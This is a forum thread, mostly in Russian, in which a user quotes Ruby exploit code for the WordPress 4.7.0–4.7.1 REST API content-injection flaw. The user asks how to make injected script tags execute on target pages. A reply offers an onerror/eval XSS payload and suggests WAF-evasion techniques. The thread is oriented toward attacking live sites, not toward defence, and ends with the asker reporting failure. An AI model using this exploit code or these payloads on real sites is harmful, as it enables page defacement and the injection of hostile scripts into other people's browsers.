Как инжектить JS в уязвимости WP Content Injection?

[CryNet]

В WP 4.7.0 и 4.7.1 есть дыра позволяющая заменить контент на странице.
Есть сплойт: # Exploit Title: WP Content Injection# Date: 31 Jan' 2017# Exploit Author: H - Pastebin.com
В сплойте есть строки:

response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
#"title" => "You have been hacked",
"content" => "<script>console.log(1)</script>"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }

При эксплуатации строка <script>console.log(1)</script> превращяется в текст: console.log(1), в HTML это выглядит так: <p>console.log(1)</p>. Пробовал так: <script type="text/javascript">console.log(1)</script>, пробовал ссылу вставлять: <script src="тут ссылка"></script> - в таком случае будет пустой div.
Есть способ это пофиксить и отгрузить как JS, чтобы он выполнился?

 

[no1]

Maby you could try to post <test> to figure out if there is some kind of WAF active filtering for example <>some</> tags

if it's not filtered you can try on tag payload like <img src=x name="confirm(1)" onerror="eval(name)"/>

if it doesnt work maby the WAF can be bypassed with an other technique, https://owasp.org/www-community/xss-filter-evasion-cheatsheet or try to google XSS WAF evasion.

and maby the owner of the application patched the vuln himself.

 

[CryNet]

Maby you could try to post <test> to figure out if there is some kind of WAF active filtering for example <>some</> tags

if it's not filtered you can try on tag payload like <img src=x name="confirm(1)" onerror="eval(name)"/>

if it doesnt work maby the WAF can be bypassed with an other technique, https://owasp.org/www-community/xss-filter-evasion-cheatsheet or try to google XSS WAF evasion.

and maby the owner of the application patched the vuln himself.

No. Its don't work